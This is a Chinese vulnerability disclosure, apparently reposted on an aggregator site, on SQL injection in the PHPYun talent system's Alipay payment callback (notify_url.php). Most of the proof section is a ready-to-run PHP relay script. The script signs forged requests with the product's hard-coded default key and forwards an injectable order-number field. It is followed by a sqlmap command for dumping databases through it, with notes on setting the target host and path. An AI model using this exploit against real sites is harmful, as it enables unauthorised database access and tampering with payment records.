### 簡要描述：

### 詳細(xì)說明：

api/alipaydual/notify_url.php

require_once("alipay.config.php");

require_once("lib/alipay_notify.class.php");

require_once(dirname(dirname(dirname(__FILE__)))."/data/db.config.php");

require_once(dirname(dirname(dirname(__FILE__)))."/include/mysql.class.php");

$db = new mysql($db_config['dbhost'], $db_config['dbuser'], $db_config['dbpass'], $db_config['dbname'], ALL_PS, $db_config['charset']);

//計(jì)算得出通知驗(yàn)證結(jié)果

$alipayNotify = new AlipayNotify($aliapy_config);

$verify_result = $alipayNotify->verifyNotify();//有一處驗(yàn)證 驗(yàn)證可以繞過

if($verify_result) {//驗(yàn)證成功

echo 222;/

//請(qǐng)?jiān)谶@里加上商戶的業(yè)務(wù)邏輯程序代

//——請(qǐng)根據(jù)您的業(yè)務(wù)邏輯來編寫程序(以下代碼僅作參考)——

//獲取支付寶的通知返回參數(shù)，可參考技術(shù)文檔中服務(wù)器異步通知參數(shù)列表

$out_trade_no= $_POST['out_trade_no']; //獲取訂單號(hào)

$trade_no= $_POST['trade_no']; //獲取支付寶交易號(hào)

$total= $_POST['price'];//獲取總價(jià)格

$sql=$db->query("select * from `".$db_config["def"]."company_order` where `order_id`='$out_trade_no'");//這里進(jìn)行了注入

echo "select * from `".$db_config["def"]."company_order` where `order_id`='$out_trade_no'";

$row=mysql_fetch_array($sql);

$sOld_trade_status = $row['order_state'];

if($_POST['trade_status'] == 'WAIT_BUYER_PAY') {

驗(yàn)證代碼：

function verifyNotify(){

if(empty($_POST)) {//判斷POST來的數(shù)組是否為空

return false;

}

else {

//生成簽名結(jié)果

$mysign = $this->getMysign($_POST);//這里會(huì)產(chǎn)生一個(gè)KEY 我們跟一下

echo $mysign."||";

function getMysign($para_temp) {

//除去待簽名參數(shù)數(shù)組中的空值和簽名參數(shù)

$para_filter = paraFilter($para_temp);

//對(duì)待簽名參數(shù)數(shù)組排序

$para_sort = argSort($para_filter);

//生成簽名結(jié)果

echo trim($this->aliapy_config['key'])."::". strtoupper(trim($this->aliapy_config['sign_type'])).":x:";

$mysign = buildMysign($para_sort, trim($this->aliapy_config['key']), strtoupper(trim($this->aliapy_config['sign_type'])));//可以看到這里有利用一個(gè)KEY 進(jìn)行加密 這個(gè)KEY是有默認(rèn)值的 我們可以構(gòu)造一個(gè)中轉(zhuǎn)來生產(chǎn)一個(gè)KEY進(jìn)行注入！

return $mysign;

}

### 漏洞證明：

中轉(zhuǎn)程序如下

================================================================================

function paraFilter($para) {

$para_filter = array();

while (list ($key, $val) = each ($para)) {

if($key == "sign" || $key == "sign_type" || $val == "")continue;

else$para_filter[$key] = $para[$key];

}

return $para_filter;

}

function argSort($para) {

ksort($para);

reset($para);

return $para;

}

function createLinkstring($para) {

$arg = "";

while (list ($key, $val) = each ($para)) {

$arg.=$key."=".$val."&";

}

//去掉最后一個(gè)&字符

$arg = substr($arg,0,count($arg)-2);

//如果存在轉(zhuǎn)義字符，那么去掉轉(zhuǎn)義

if(get_magic_quotes_gpc()){$arg = stripslashes($arg);}

return $arg;

}

function sign($prestr,$sign_type='MD5') {

$sign='';

if($sign_type == 'MD5') {

$sign = md5($prestr);

}elseif($sign_type =='DSA') {

//DSA 簽名方法待后續(xù)開發(fā)

die("DSA 簽名方法待后續(xù)開發(fā)，請(qǐng)先使用MD5簽名方式");

}else {

die("支付寶暫不支持".$sign_type."類型的簽名方式");

}

return $sign;

}

function buildMysign($sort_para,$key,$sign_type = "MD5") {

//把數(shù)組所有元素，按照“參數(shù)=參數(shù)值”的模式用“&”字符拼接成字符串

$prestr = createLinkstring($sort_para);

//把拼接后的字符串再與安全校驗(yàn)碼直接連接起來

$prestr = $prestr.$key;

//把最終的字符串簽名，獲得簽名結(jié)果

$mysgin = sign($prestr,$sign_type);

return $mysgin;

}

function getMysign($para_temp) {

//除去待簽名參數(shù)數(shù)組中的空值和簽名參數(shù)

$para_filter = paraFilter($para_temp);

//對(duì)待簽名參數(shù)數(shù)組排序

$para_sort = argSort($para_filter);

//生成簽名結(jié)果

$mysign = buildMysign($para_sort, 'jbjwjnu6zhax0eewc3vfiqldvrg8rnfz', 'MD5');

return $mysign;

}

$hash=getMysign($_POST);

$host="127.0.0.1";//這里設(shè)置下host！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！

$data="sign={$hash}&out_trade_no={$_POST[out_trade_no]}";

$username=rawurlencode(stripslashes($_GET['username']));

$message = "POST /yun/api/alipaydual/notify_url.php HTTP/1.1\r\n";//這里記得修改路徑！！！！！！！！！！！！！！！！！！！！

$message .= "Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3\r\n";

$message .= "Content-Type: application/x-www-form-urlencoded\r\n";

$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) Havij\r\n";

$message .= "Host: {$host}\r\n";

$message .= "Content-Length: ".strlen($data)."\r\n";

$message .= "Connection: close\r\n";

$message .= "\r\n";

$message .=$data;

//echo $message;

//file_put_contents('2.txt',$message,FILE_APPEND);

//print $message;

//exit();

$ock=fsockopen($host,80);

if (!$ock) {

echo 'No response from xx!';

//die;

return '';

}

fputs($ock,$message);

while ($ock && !feof($ock))

$resp .= fread($ock, 1024);

echo $resp;

?>

測試方式

sqlmap.py -u "http://127.0.0.1/x.php" --data="out_trade_no=1" --dbs

就可以了

[](https://images.seebug.org/upload/201311/21201216df9a9f8d92c8e7274ceb6fde0cff1f21.png)

總結(jié)

以上是生活随笔為你收集整理的api uc.php 漏洞,php云人才系统 UC API 未初始化注入漏洞的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。